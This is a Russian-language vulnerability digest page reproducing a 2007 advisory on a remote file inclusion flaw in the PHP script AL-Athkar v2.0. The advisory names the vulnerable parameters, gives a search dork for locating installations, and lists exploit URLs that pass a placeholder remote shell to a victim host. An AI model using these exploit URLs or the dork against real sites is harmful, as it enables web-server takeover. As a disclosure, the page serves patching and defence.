Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

C-SAM oneWallet forget password Cross Site Scripting vulnerability

VisionProject Multiple XSS vuln.

EZPhotoSales 1.9.3 Multiple Vulnerabilities

PHP mSQL (msql_connect) Buffer Overflow PoC

From:	RaeD Hasadya <raed_(at)_bsdmail.com>
Date:	6 августа 2007 г.
Subject:	AL-Athkar.v2.0 Remote File Include

Discovred By : Hasadya Raed
----------------------------
Contact : RaeD@BsdMail.Com , Hacker_Web@W.Cn , Gunman_Pump@Hotmail.Com
----------------------------
Greetz : Fairoz
----------------------------
Script: AL-Athkar.v2.0
----------------------------
Download: http://delmaa.com/upfile/users/AL-Athkar.v2.0.rar
----------------------------
Dork: "AL-Athkar.v2.0"
----------------------------
B.File:
index.php
----------------------------
Vuln code:Main.php?include
Vuln code:get.php?include
Vuln code:count.php?exec
----------------------------
Exploit:
Http://www.Victim.com/path/count.php?exec=[Shell-Attack]
Http://www.Victim.com/path/Main.php?include=[Shell-Attack]
Http://www.Victim.com/path/get.php?include=[Shell-Attack]
----------------------------
<----!Team Hackers Israel----!>